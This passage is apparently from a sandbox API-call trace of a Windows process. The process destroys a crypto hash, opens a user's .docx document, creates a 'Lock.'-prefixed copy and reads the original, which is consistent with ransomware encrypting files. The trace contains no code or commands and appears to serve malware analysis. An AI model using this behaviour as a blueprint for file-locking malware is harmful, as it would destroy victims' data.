(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0260.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0260.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0260.215] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0260.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0260.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0260.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0260.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0260.216] CryptDestroyHash (hHash=0xaa5960) returned 1 [0260.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0260.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0260.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0260.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0260.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0260.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0260.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0260.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0260.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0260.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0260.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0260.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0260.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0260.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0260.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0260.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0260.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0260.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0260.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0260.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0260.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0260.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0260.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0260.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0260.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0260.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0260.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0260.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0260.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0260.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0260.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0260.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0260.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0260.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0260.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0260.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.218] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0260.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0260.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0260.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0260.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0260.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0260.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0260.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0260.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0260.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0260.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0260.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0260.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0260.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0260.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0260.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0260.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0260.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0260.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0260.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0260.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0260.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0260.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0260.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0260.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0260.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0260.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0260.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0260.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0260.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0260.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0260.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0260.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0260.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0260.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0260.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0260.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0260.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0260.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0260.222] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0260.223] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.223] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.223] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0260.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0260.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0260.223] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/46_piKwe1cHySGVu21.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\46_pikwe1chysgvu21.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0260.224] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0260.224] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0260.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0260.224] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0260.224] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.224] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0260.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0260.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0260.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0260.225] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.46_piKwe1cHySGVu21.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.46_pikwe1chysgvu21.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0260.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0260.226] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0260.226] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.226] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0260.226] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0260.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0260.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0260.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0260.226] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0260.226] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x7a1a, lpOverlapped=0x0) returned 1 [0260.229] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0260.231] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0260.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0260.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0260.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0260.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0260.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7a1a) returned 0x3571018 [0260.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0260.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3571018 | out: hHeap=0x25c0000) returned 1 [0260.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0260.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0260.233] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0260.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0260.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0260.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0260.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0260.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0260.233] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0260.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0260.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0260.233] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0260.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0260.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0260.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0260.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0260.234] RtlAllocateHeap 